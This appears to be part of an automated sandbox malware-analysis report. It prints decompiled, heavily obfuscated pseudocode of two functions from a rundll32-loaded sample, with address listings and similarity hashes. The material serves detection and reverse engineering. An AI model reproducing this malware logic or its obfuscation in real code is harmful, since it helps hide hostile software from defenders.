                                                                                                                    0x0035067c
                                                                                                                    0x00350684
                                                                                                                    0x0035068c
                                                                                                                    0x00350697
                                                                                                                    0x0035069f
                                                                                                                    0x003506aa
                                                                                                                    0x003506b2
                                                                                                                    0x003506b7
                                                                                                                    0x003506c4
                                                                                                                    0x003506c5
                                                                                                                    0x003506cc
                                                                                                                    0x003506d0
                                                                                                                    0x003506d8
                                                                                                                    0x003506e0
                                                                                                                    0x003506e5
                                                                                                                    0x003506f3
                                                                                                                    0x003506f7
                                                                                                                    0x003506ff
                                                                                                                    0x0035070a
                                                                                                                    0x00350715
                                                                                                                    0x00350720
                                                                                                                    0x00350720
                                                                                                                    0x00350722
                                                                                                                    0x00350723
                                                                                                                    0x00350723
                                                                                                                    0x00350723
                                                                                                                    0x00350728
                                                                                                                    0x00350728
                                                                                                                    0x0035072e
                                                                                                                    0x0035098a
                                                                                                                    0x00350991
                                                                                                                    0x00000000
                                                                                                                    0x00350734
                                                                                                                    0x0035073a
                                                                                                                    0x003508ea
                                                                                                                    0x003508f3
                                                                                                                    0x003508fb
                                                                                                                    0x00350901
                                                                                                                    0x0035095c
                                                                                                                    0x00350967
                                                                                                                    0x0035096a
                                                                                                                    0x0035096f
                                                                                                                    0x00350993
                                                                                                                    0x00350995
                                                                                                                    0x0035099a
                                                                                                                    0x00350740
                                                                                                                    0x00350742
                                                                                                                    0x003508ca
                                                                                                                    0x003508d1
                                                                                                                    0x003508d4
                                                                                                                    0x003508d6
                                                                                                                    0x003508de
                                                                                                                    0x00000000
                                                                                                                    0x00350748
                                                                                                                    0x0035074e
                                                                                                                    0x00350831
                                                                                                                    0x0035083c
                                                                                                                    0x00350840
                                                                                                                    0x00350855
                                                                                                                    0x00350856
                                                                                                                    0x0035085b
                                                                                                                    0x0035085e
                                                                                                                    0x00350720
                                                                                                                    0x00350720
                                                                                                                    0x00350722
                                                                                                                    0x00000000
                                                                                                                    0x00350722
                                                                                                                    0x00350754
                                                                                                                    0x0035075a
                                                                                                                    0x00350811
                                                                                                                    0x00350817
                                                                                                                    0x0035081f
                                                                                                                    0x0035081f
                                                                                                                    0x00350822
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0035081c
                                                                                                                    0x0035081c
                                                                                                                    0x0035081c
                                                                                                                    0x00350824
                                                                                                                    0x00350827
                                                                                                                    0x00000000
                                                                                                                    0x00350760
                                                                                                                    0x00350760
                                                                                                                    0x00350766
                                                                                                                    0x0035076c
                                                                                                                    0x00350778
                                                                                                                    0x00350786
                                                                                                                    0x00350794
                                                                                                                    0x003507cb
                                                                                                                    0x003507d8
                                                                                                                    0x003507dc
                                                                                                                    0x003507ea
                                                                                                                    0x003507ff
                                                                                                                    0x00350804
                                                                                                                    0x00350807
                                                                                                                    0x00350720
                                                                                                                    0x00350720
                                                                                                                    0x00350722
                                                                                                                    0x00350723
                                                                                                                    0x00350723
                                                                                                                    0x00000000
                                                                                                                    0x00350723
                                                                                                                    0x00350720
                                                                                                                    0x00350766
                                                                                                                    0x0035075a
                                                                                                                    0x0035074e
                                                                                                                    0x00350742
                                                                                                                    0x0035073a
                                                                                                                    0x0035099b
                                                                                                                    0x0035099b
                                                                                                                    0x003509b4
                                                                                                                    0x003509b4
                                                                                                                    0x00350723

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Agz$DWK$E+A$g$pw
                                                                                                                    • API String ID: 0-1474679353
                                                                                                                    • Opcode ID: 14fc4580d7fdcb98b70a43224875a21b3a91f65eb026500cfb29d9138491ddf3
                                                                                                                    • Instruction ID: c71b5c30ba34f9f43b9548b6a7830961d68ce1dc315b64f60a5750d9afc51158
                                                                                                                    • Opcode Fuzzy Hash: 14fc4580d7fdcb98b70a43224875a21b3a91f65eb026500cfb29d9138491ddf3
                                                                                                                    • Instruction Fuzzy Hash: 5032137150C3808FD369CF25C98AA8BFBF2BBC4748F10891DE5998A261D7B59949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033F09B Relevance: 6.6, Strings: 5, Instructions: 359COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E0033F09B(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _t425;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t458;
				void* _t502;
				void* _t503;
				signed int* _t507;

				_t507 =  &_v2772;
				_v2628 = 0x98f0ce;
				_v2628 = _v2628 >> 0xb;
				_v2628 = _v2628 ^ 0x00001337;
				_v2696 = 0x96ddc1;
				_v2696 = _v2696 + 0xffff0eed;
				_v2696 = _v2696 + 0xffffc9f2;
				_v2696 = _v2696 ^ 0x009155bb;
				_v2748 = 0x5205ca;
				_v2748 = _v2748 ^ 0x19402ba5;
				_t502 = __ecx;
				_t503 = 0xea1969c;
				_t443 = 0x43;
				_v2748 = _v2748 / _t443;
				_t444 = 0xb;
				_v2748 = _v2748 / _t444;
				_v2748 = _v2748 ^ 0x000a2456;
				_v2604 = 0x2f1706;
				_t445 = 0x26;
				_v2604 = _v2604 * 6;
				_v2604 = _v2604 ^ 0x011fcdd9;
				_v2684 = 0x108800;
				_v2684 = _v2684 >> 0xc;
				_v2684 = _v2684 / _t445;
				_v2684 = _v2684 ^ 0x00056909;
				_v2764 = 0x56ac6f;
				_v2764 = _v2764 << 0xe;
				_v2764 = _v2764 | 0x24a96f4c;
				_t446 = 0x42;
				_v2764 = _v2764 / _t446;
				_v2764 = _v2764 ^ 0x02abe6d6;
				_v2680 = 0xb60c61;
				_t447 = 0x16;
				_v2680 = _v2680 / _t447;
				_v2680 = _v2680 << 7;
				_v2680 = _v2680 ^ 0x04229d93;
				_v2712 = 0x6d1dcd;
				_v2712 = _v2712 | 0x18b294c6;
				_v2712 = _v2712 ^ 0xf88c4d23;
				_v2712 = _v2712 ^ 0xe07332c4;
				_v2612 = 0x9fb2e7;
				_v2612 = _v2612 | 0xd190ff6b;
				_v2612 = _v2612 ^ 0xd1908c6f;
				_v2732 = 0x85d89e;
				_v2732 = _v2732 << 5;
				_v2732 = _v2732 >> 0xd;
				_t448 = 0x37;
				_v2732 = _v2732 / _t448;
				_v2732 = _v2732 ^ 0x0009f3db;
				_v2704 = 0x8a2dac;
				_v2704 = _v2704 << 0xd;
				_v2704 = _v2704 * 6;
				_v2704 = _v2704 ^ 0xa2425f92;
				_v2620 = 0x8530c4;
				_v2620 = _v2620 | 0x7f36b61d;
				_v2620 = _v2620 ^ 0x7fb2adaf;
				_v2756 = 0xf61f4c;
				_v2756 = _v2756 >> 0xe;
				_t449 = 0x4b;
				_v2756 = _v2756 / _t449;
				_v2756 = _v2756 + 0xffffd188;
				_v2756 = _v2756 ^ 0xfff88f11;
				_v2660 = 0x7ee31b;
				_v2660 = _v2660 | 0xd8d04f1e;
				_v2660 = _v2660 ^ 0xd8ffeb88;
				_v2672 = 0xc71ff5;
				_v2672 = _v2672 >> 0xf;
				_v2672 = _v2672 ^ 0x000b63b3;
				_v2740 = 0x49f4c1;
				_t450 = 0x76;
				_v2740 = _v2740 * 0x4b;
				_v2740 = _v2740 + 0xffff254a;
				_v2740 = _v2740 * 0x48;
				_v2740 = _v2740 ^ 0x17c5e1bd;
				_v2652 = 0x2197ca;
				_v2652 = _v2652 * 0x5a;
				_v2652 = _v2652 ^ 0x0bc440cb;
				_v2720 = 0x771a3f;
				_v2720 = _v2720 >> 0xe;
				_v2720 = _v2720 + 0x9ab6;
				_v2720 = _v2720 ^ 0x0000c33a;
				_v2688 = 0x2271c;
				_v2688 = _v2688 / _t450;
				_v2688 = _v2688 << 9;
				_v2688 = _v2688 ^ 0x0000f5c5;
				_v2608 = 0xceafd9;
				_t451 = 0x5b;
				_v2608 = _v2608 / _t451;
				_v2608 = _v2608 ^ 0x00020c5c;
				_v2644 = 0x474c12;
				_v2644 = _v2644 + 0xffff00ab;
				_v2644 = _v2644 ^ 0x00446b0a;
				_v2760 = 0xca1d14;
				_t452 = 0x36;
				_v2760 = _v2760 / _t452;
				_v2760 = _v2760 ^ 0x098f5074;
				_v2760 = _v2760 ^ 0x8a27b7fe;
				_v2760 = _v2760 ^ 0x83afe7c4;
				_v2636 = 0x5d1272;
				_v2636 = _v2636 + 0xf4cf;
				_v2636 = _v2636 ^ 0x005057cd;
				_v2768 = 0x30e751;
				_v2768 = _v2768 | 0xcda5a365;
				_t453 = 5;
				_v2768 = _v2768 * 0x7d;
				_v2768 = _v2768 + 0xffff52f5;
				_v2768 = _v2768 ^ 0x71df24ad;
				_v2772 = 0x3d9f4c;
				_v2772 = _v2772 / _t453;
				_v2772 = _v2772 | 0x64d73223;
				_v2772 = _v2772 >> 2;
				_v2772 = _v2772 ^ 0x1935e4e1;
				_v2744 = 0xaeb35;
				_v2744 = _v2744 << 0x10;
				_v2744 = _v2744 + 0xffff2953;
				_v2744 = _v2744 + 0xffff82ad;
				_v2744 = _v2744 ^ 0xeb3966f5;
				_v2752 = 0x66dc67;
				_v2752 = _v2752 + 0x90a4;
				_v2752 = _v2752 + 0x6fc1;
				_v2752 = _v2752 ^ 0x6a9d4e17;
				_v2752 = _v2752 ^ 0x6af88c69;
				_v2716 = 0xce0c89;
				_v2716 = _v2716 ^ 0x42dcf22f;
				_v2716 = _v2716 | 0xbb0a480d;
				_v2716 = _v2716 ^ 0xfb186e5d;
				_v2616 = 0x5746b3;
				_v2616 = _v2616 | 0xa6a5976e;
				_v2616 = _v2616 ^ 0xa6f469a2;
				_v2708 = 0xa6d434;
				_v2708 = _v2708 << 0xa;
				_v2708 = _v2708 | 0x1b169a68;
				_v2708 = _v2708 ^ 0x9b5e88e0;
				_v2736 = 0x9f8594;
				_v2736 = _v2736 + 0xffffc5c7;
				_t454 = 9;
				_v2736 = _v2736 / _t454;
				_v2736 = _v2736 + 0xffff650c;
				_v2736 = _v2736 ^ 0x001c27e2;
				_v2668 = 0xeff616;
				_v2668 = _v2668 << 4;
				_v2668 = _v2668 ^ 0x0efcbcf0;
				_v2640 = 0x84564;
				_v2640 = _v2640 >> 9;
				_v2640 = _v2640 ^ 0x00099447;
				_v2648 = 0xb94e9c;
				_v2648 = _v2648 >> 7;
				_v2648 = _v2648 ^ 0x000c8381;
				_v2656 = 0x4f0029;
				_v2656 = _v2656 * 0x26;
				_v2656 = _v2656 ^ 0x0bb68559;
				_v2700 = 0xc64297;
				_v2700 = _v2700 << 0x10;
				_v2700 = _v2700 ^ 0xb6f38c4d;
				_v2700 = _v2700 ^ 0xf46a369f;
				_v2664 = 0x51e71d;
				_v2664 = _v2664 * 0xf;
				_v2664 = _v2664 ^ 0x04c73adc;
				_v2728 = 0xfedaba;
				_v2728 = _v2728 + 0xfffff930;
				_v2728 = _v2728 + 0xfffff3b0;
				_v2728 = _v2728 + 0xffff7b6e;
				_v2728 = _v2728 ^ 0x00f92d7b;
				_v2632 = 0xc4e34f;
				_t425 = _v2632 * 0x17;
				_v2632 = _t425;
				_v2632 = _v2632 ^ 0x11b64b79;
				_v2676 = 0x4fbb37;
				_v2676 = _v2676 + 0x433;
				_v2676 = _v2676 >> 1;
				_v2676 = _v2676 ^ 0x002442b0;
				_v2724 = 0xe01143;
				_v2724 = _v2724 | 0x0dc37ba2;
				_v2724 = _v2724 + 0xe020;
				_v2724 = _v2724 ^ 0x0dec213c;
				_v2624 = 0xd4ff52;
				_v2624 = _v2624 << 0xe;
				_v2624 = _v2624 ^ 0x3fd02267;
				_v2692 = 0xfd19e6;
				_v2692 = _v2692 + 0x8b9c;
				_v2692 = _v2692 | 0x5cbd23eb;
				_v2692 = _v2692 ^ 0x5cf129d9;
				while(_t503 != 0x5de06da) {
					if(_t503 == 0xea1969c) {
						_t503 = 0xfa9128f;
						continue;
					} else {
						_t515 = _t503 - 0xfa9128f;
						if(_t503 != 0xfa9128f) {
							L8:
							__eflags = _t503 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E0034DA22(_v2696, _v2748, _t515, _v2604,  &_v2600, _t454, _v2684);
							 *((short*)(E0033B6CF( &_v2600, _v2764, _v2680, _v2712))) = 0;
							E00338969(_v2612,  &_v1560, _t515, _v2732, _v2704);
							_push(_v2660);
							_push(_v2756);
							E003347CE( &_v2600, _v2672, _v2620, _v2740, _v2652, E0034DCF7(_v2620, 0x331308, _t515),  &_v1560, _v2720, _v2688);
							E0033A8B0(_v2608, _t437, _v2644);
							_t454 = _v2760;
							_t425 = E0033EA99(_v2760, _t502, _v2636, _v2768,  &_v2080, _v2772);
							_t507 =  &(_t507[0x17]);
							if(_t425 != 0) {
								_t503 = 0x5de06da;
								continue;
							}
						}
					}
					return _t425;
				}
				_push(_v2616);
				_push(_v2628);
				_push(_v2716);
				_push( &_v1040);
				E003446BB(_v2744, _v2752);
				_push(_v2668);
				_push(_v2736);
				E003347CE( &_v1040, _v2640, _v2708, _v2648, _v2656, E0034DCF7(_v2708, 0x331348, __eflags),  &_v2080, _v2700, _v2664);
				_t458 = _v2728;
				E0033A8B0(_t458, _t428, _v2632);
				_push(_v2692);
				_push(0);
				_push(_t458);
				_push(0);
				_push(0);
				_push(_v2624);
				_t454 = _v2676;
				_push( &_v520);
				_t425 = E0033AB87(_v2676, _v2724, __eflags);
				_t507 = _t507 - 0xc + 0x64;
				_t503 = 0xa8e801c;
				goto L8;
			}



































































                                                                                                                    0x0033f09b
                                                                                                                    0x0033f0a1
                                                                                                                    0x0033f0ae
                                                                                                                    0x0033f0b6
                                                                                                                    0x0033f0c1
                                                                                                                    0x0033f0c9
                                                                                                                    0x0033f0d1
                                                                                                                    0x0033f0d9
                                                                                                                    0x0033f0e1
                                                                                                                    0x0033f0e9
                                                                                                                    0x0033f0fa
                                                                                                                    0x0033f0fc
                                                                                                                    0x0033f101
                                                                                                                    0x0033f106
                                                                                                                    0x0033f110
                                                                                                                    0x0033f115
                                                                                                                    0x0033f11b
                                                                                                                    0x0033f123
                                                                                                                    0x0033f136
                                                                                                                    0x0033f139
                                                                                                                    0x0033f140
                                                                                                                    0x0033f14b
                                                                                                                    0x0033f153
                                                                                                                    0x0033f160
                                                                                                                    0x0033f164
                                                                                                                    0x0033f16c
                                                                                                                    0x0033f174
                                                                                                                    0x0033f179
                                                                                                                    0x0033f185
                                                                                                                    0x0033f18a
                                                                                                                    0x0033f190
                                                                                                                    0x0033f198
                                                                                                                    0x0033f1a4
                                                                                                                    0x0033f1a9
                                                                                                                    0x0033f1af
                                                                                                                    0x0033f1b4
                                                                                                                    0x0033f1bc
                                                                                                                    0x0033f1c4
                                                                                                                    0x0033f1cc
                                                                                                                    0x0033f1d4
                                                                                                                    0x0033f1dc
                                                                                                                    0x0033f1e7
                                                                                                                    0x0033f1f2
                                                                                                                    0x0033f1fd
                                                                                                                    0x0033f205
                                                                                                                    0x0033f20a
                                                                                                                    0x0033f213
                                                                                                                    0x0033f216
                                                                                                                    0x0033f21a
                                                                                                                    0x0033f222
                                                                                                                    0x0033f22a
                                                                                                                    0x0033f234
                                                                                                                    0x0033f238
                                                                                                                    0x0033f240
                                                                                                                    0x0033f24d
                                                                                                                    0x0033f258
                                                                                                                    0x0033f263
                                                                                                                    0x0033f26b
                                                                                                                    0x0033f276
                                                                                                                    0x0033f27b
                                                                                                                    0x0033f281
                                                                                                                    0x0033f289
                                                                                                                    0x0033f291
                                                                                                                    0x0033f29c
                                                                                                                    0x0033f2a7
                                                                                                                    0x0033f2b2
                                                                                                                    0x0033f2ba
                                                                                                                    0x0033f2bf
                                                                                                                    0x0033f2c7
                                                                                                                    0x0033f2d4
                                                                                                                    0x0033f2d7
                                                                                                                    0x0033f2db
                                                                                                                    0x0033f2e8
                                                                                                                    0x0033f2ec
                                                                                                                    0x0033f2f4
                                                                                                                    0x0033f307
                                                                                                                    0x0033f30e
                                                                                                                    0x0033f319
                                                                                                                    0x0033f321
                                                                                                                    0x0033f326
                                                                                                                    0x0033f32e
                                                                                                                    0x0033f336
                                                                                                                    0x0033f346
                                                                                                                    0x0033f34a
                                                                                                                    0x0033f34f
                                                                                                                    0x0033f357
                                                                                                                    0x0033f369
                                                                                                                    0x0033f36e
                                                                                                                    0x0033f377
                                                                                                                    0x0033f382
                                                                                                                    0x0033f38d
                                                                                                                    0x0033f398
                                                                                                                    0x0033f3a3
                                                                                                                    0x0033f3af
                                                                                                                    0x0033f3b4
                                                                                                                    0x0033f3ba
                                                                                                                    0x0033f3c2
                                                                                                                    0x0033f3ca
                                                                                                                    0x0033f3d2
                                                                                                                    0x0033f3dd
                                                                                                                    0x0033f3e8
                                                                                                                    0x0033f3f3
                                                                                                                    0x0033f3fb
                                                                                                                    0x0033f408
                                                                                                                    0x0033f409
                                                                                                                    0x0033f40d
                                                                                                                    0x0033f415
                                                                                                                    0x0033f41d
                                                                                                                    0x0033f42b
                                                                                                                    0x0033f42f
                                                                                                                    0x0033f437
                                                                                                                    0x0033f43e
                                                                                                                    0x0033f44b
                                                                                                                    0x0033f453
                                                                                                                    0x0033f458
                                                                                                                    0x0033f460
                                                                                                                    0x0033f468
                                                                                                                    0x0033f470
                                                                                                                    0x0033f478
                                                                                                                    0x0033f480
                                                                                                                    0x0033f488
                                                                                                                    0x0033f490
                                                                                                                    0x0033f498
                                                                                                                    0x0033f4a0
                                                                                                                    0x0033f4a8
                                                                                                                    0x0033f4b0
                                                                                                                    0x0033f4b8
                                                                                                                    0x0033f4c3
                                                                                                                    0x0033f4ce
                                                                                                                    0x0033f4d9
                                                                                                                    0x0033f4e1
                                                                                                                    0x0033f4e6
                                                                                                                    0x0033f4ee
                                                                                                                    0x0033f4f6
                                                                                                                    0x0033f4fe
                                                                                                                    0x0033f50c
                                                                                                                    0x0033f50f
                                                                                                                    0x0033f513
                                                                                                                    0x0033f51b
                                                                                                                    0x0033f523
                                                                                                                    0x0033f52b
                                                                                                                    0x0033f530
                                                                                                                    0x0033f538
                                                                                                                    0x0033f543
                                                                                                                    0x0033f54b
                                                                                                                    0x0033f556
                                                                                                                    0x0033f561
                                                                                                                    0x0033f569
                                                                                                                    0x0033f574
                                                                                                                    0x0033f587
                                                                                                                    0x0033f58e
                                                                                                                    0x0033f599
                                                                                                                    0x0033f5a1
                                                                                                                    0x0033f5a6
                                                                                                                    0x0033f5ae
                                                                                                                    0x0033f5b6
                                                                                                                    0x0033f5c3
                                                                                                                    0x0033f5c7
                                                                                                                    0x0033f5cf
                                                                                                                    0x0033f5d7
                                                                                                                    0x0033f5df
                                                                                                                    0x0033f5e7
                                                                                                                    0x0033f5ef
                                                                                                                    0x0033f5f7
                                                                                                                    0x0033f602
                                                                                                                    0x0033f60a
                                                                                                                    0x0033f611
                                                                                                                    0x0033f61c
                                                                                                                    0x0033f624
                                                                                                                    0x0033f62c
                                                                                                                    0x0033f630
                                                                                                                    0x0033f638
                                                                                                                    0x0033f640
                                                                                                                    0x0033f648
                                                                                                                    0x0033f650
                                                                                                                    0x0033f658
                                                                                                                    0x0033f663
                                                                                                                    0x0033f66b
                                                                                                                    0x0033f676
                                                                                                                    0x0033f67e
                                                                                                                    0x0033f686
                                                                                                                    0x0033f68e
                                                                                                                    0x0033f696
                                                                                                                    0x0033f6a4
                                                                                                                    0x0033f7b0
                                                                                                                    0x00000000
                                                                                                                    0x0033f6aa
                                                                                                                    0x0033f6aa
                                                                                                                    0x0033f6b0
                                                                                                                    0x0033f883
                                                                                                                    0x0033f883
                                                                                                                    0x0033f889
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033f6b6
                                                                                                                    0x0033f6d2
                                                                                                                    0x0033f700
                                                                                                                    0x0033f70a
                                                                                                                    0x0033f70f
                                                                                                                    0x0033f71b
                                                                                                                    0x0033f762
                                                                                                                    0x0033f777
                                                                                                                    0x0033f795
                                                                                                                    0x0033f799
                                                                                                                    0x0033f79e
                                                                                                                    0x0033f7a3
                                                                                                                    0x0033f7a9
                                                                                                                    0x00000000
                                                                                                                    0x0033f7a9
                                                                                                                    0x0033f7a3
                                                                                                                    0x0033f6b0
                                                                                                                    0x0033f898
                                                                                                                    0x0033f898
                                                                                                                    0x0033f7ba
                                                                                                                    0x0033f7c8
                                                                                                                    0x0033f7cf
                                                                                                                    0x0033f7de
                                                                                                                    0x0033f7df
                                                                                                                    0x0033f7e4
                                                                                                                    0x0033f7f0
                                                                                                                    0x0033f837
                                                                                                                    0x0033f843
                                                                                                                    0x0033f849
                                                                                                                    0x0033f858
                                                                                                                    0x0033f85c
                                                                                                                    0x0033f85e
                                                                                                                    0x0033f85f
                                                                                                                    0x0033f861
                                                                                                                    0x0033f863
                                                                                                                    0x0033f86e
                                                                                                                    0x0033f875
                                                                                                                    0x0033f876
                                                                                                                    0x0033f87b
                                                                                                                    0x0033f87e
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: kD$)$5$<!$Q0
                                                                                                                    • API String ID: 0-101729813
                                                                                                                    • Opcode ID: 2df1e7ca13c7512820df859dd4d65bfd91544a9bd5433958c26c3197f4237c74
                                                                                                                    • Instruction ID: 5a189faa8a94295ef3b211b348f1c3352bb87a82ff4523e9d121d84cc5e13b99
                                                                                                                    • Opcode Fuzzy Hash: 2df1e7ca13c7512820df859dd4d65bfd91544a9bd5433958c26c3197f4237c74
                                                                                                                    • Instruction Fuzzy Hash: 7E1200715083809FD3A9CF21C48AA4BFBE2FBC5758F50891DE5D98A260D7B58949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00340001 Relevance: 6.4, Strings: 5, Instructions: 191COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E00340001(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				void* _t154;
				void* _t174;
				char _t178;
				void* _t183;
				char* _t189;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int* _t220;

				_push(_a4);
				_t209 = __edx;
				_push(__edx);
				_push(__ecx);
				E003420B9(_t154);
				_v132 = _v132 & 0x00000000;
				_t220 =  &(( &_v204)[3]);
				_v140 = 0x6f537b;
				_v136 = 0x2895cf;
				_t183 = 0xf669bfa;
				_v164 = 0xc3509d;
				_v164 = _v164 >> 0xf;
				_v164 = _v164 ^ 0x0007728b;
				_v188 = 0x58efa0;
				_v188 = _v188 + 0xffff9444;
				_t210 = 0x2f;
				_v188 = _v188 / _t210;
				_v188 = _v188 ^ 0x000ac4b2;
				_v176 = 0xa783cc;
				_v176 = _v176 << 0xa;
				_v176 = _v176 ^ 0x73295065;
				_v176 = _v176 ^ 0xed239367;
				_v148 = 0x42262a;
				_v148 = _v148 | 0x228e56d6;
				_v148 = _v148 ^ 0x22cd87d0;
				_v204 = 0xc47428;
				_v204 = _v204 + 0xffff2e33;
				_v204 = _v204 + 0xffff2fa2;
				_v204 = _v204 + 0xffff28a7;
				_v204 = _v204 ^ 0x00c63754;
				_v156 = 0x11bd56;
				_t211 = 0x5c;
				_v156 = _v156 * 0x6a;
				_v156 = _v156 ^ 0x0752342f;
				_v172 = 0x489beb;
				_v172 = _v172 + 0xfe21;
				_v172 = _v172 / _t211;
				_v172 = _v172 ^ 0x0000a4d4;
				_v192 = 0x2e5859;
				_v192 = _v192 ^ 0x83ba67d9;
				_t212 = 0x44;
				_v192 = _v192 / _t212;
				_v192 = _v192 ^ 0x01e00d99;
				_v180 = 0x89bc6d;
				_v180 = _v180 | 0xb1d25d45;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xff5cc309;
				_v168 = 0x19805c;
				_t213 = 0x18;
				_v168 = _v168 * 0x16;
				_v168 = _v168 ^ 0x4d2845a5;
				_v168 = _v168 ^ 0x4f1adce1;
				_v196 = 0x9cfdcd;
				_v196 = _v196 / _t213;
				_v196 = _v196 + 0xd8a6;
				_v196 = _v196 ^ 0x0005e56c;
				_v200 = 0x1d77da;
				_t214 = 0x6b;
				_v200 = _v200 / _t214;
				_t215 = 9;
				_v200 = _v200 / _t215;
				_t216 = 0x59;
				_v200 = _v200 / _t216;
				_v200 = _v200 ^ 0x00052bad;
				_v184 = 0x474669;
				_v184 = _v184 * 0x25;
				_v184 = _v184 + 0xffff8141;
				_v184 = _v184 ^ 0x0a4cf000;
				_v160 = 0x98ddfb;
				_v160 = _v160 << 3;
				_v160 = _v160 ^ 0x04cf55b1;
				_v152 = 0xbbc225;
				_v152 = _v152 * 0x58;
				_v152 = _v152 ^ 0x408ec409;
				while(_t183 != 0x4a2a3c4) {
					if(_t183 == 0x640e5f9) {
						__eflags = _v128;
						_t189 =  &_v128;
						while(__eflags != 0) {
							_t178 =  *_t189;
							__eflags = _t178 - 0x30;
							if(_t178 < 0x30) {
								L10:
								__eflags = _t178 - 0x61;
								if(_t178 < 0x61) {
									L12:
									__eflags = _t178 - 0x41;
									if(_t178 < 0x41) {
										L14:
										 *_t189 = 0x58;
									} else {
										__eflags = _t178 - 0x5a;
										if(_t178 > 0x5a) {
											goto L14;
										}
									}
								} else {
									__eflags = _t178 - 0x7a;
									if(_t178 > 0x7a) {
										goto L12;
									}
								}
							} else {
								__eflags = _t178 - 0x39;
								if(_t178 > 0x39) {
									goto L10;
								}
							}
							_t189 = _t189 + 1;
							__eflags =  *_t189;
						}
						_t183 = 0x4a2a3c4;
						continue;
					} else {
						if(_t183 == 0x7562914) {
							_v144 = 0x80;
							_t178 = E0033CD29(_v164,  &_v144, _v176,  &_v128);
							_t220 =  &(_t220[3]);
							_t183 = 0x640e5f9;
							continue;
						} else {
							if(_t183 == 0xf669bfa) {
								_t183 = 0x7562914;
								continue;
							}
						}
					}
					L18:
					__eflags = _t183 - 0x1718ff4;
					if(__eflags != 0) {
						continue;
					}
					return _t178;
				}
				_push(_v172);
				_push(_v156);
				_push(_v204);
				_t174 = E00348606(_v148, 0x331690, __eflags);
				E00332206( &_v128, _t209, _v196, _v200, _t174, E0033EE81(__eflags), _v184);
				_t178 = E0033A8B0(_v160, _t174, _v152);
				_t220 =  &(_t220[0xb]);
				_t183 = 0x1718ff4;
				goto L18;
			}





































                                                                                                                    0x0034000b
                                                                                                                    0x00340012
                                                                                                                    0x00340014
                                                                                                                    0x00340015
                                                                                                                    0x00340016
                                                                                                                    0x0034001b
                                                                                                                    0x00340020
                                                                                                                    0x00340023
                                                                                                                    0x0034002d
                                                                                                                    0x00340035
                                                                                                                    0x0034003a
                                                                                                                    0x00340042
                                                                                                                    0x00340047
                                                                                                                    0x0034004f
                                                                                                                    0x00340057
                                                                                                                    0x00340065
                                                                                                                    0x0034006a
                                                                                                                    0x00340070
                                                                                                                    0x00340078
                                                                                                                    0x00340080
                                                                                                                    0x00340085
                                                                                                                    0x0034008d
                                                                                                                    0x00340095
                                                                                                                    0x0034009d
                                                                                                                    0x003400a5
                                                                                                                    0x003400ad
                                                                                                                    0x003400b5
                                                                                                                    0x003400bd
                                                                                                                    0x003400c5
                                                                                                                    0x003400cd
                                                                                                                    0x003400d5
                                                                                                                    0x003400e2
                                                                                                                    0x003400e5
                                                                                                                    0x003400e9
                                                                                                                    0x003400f1
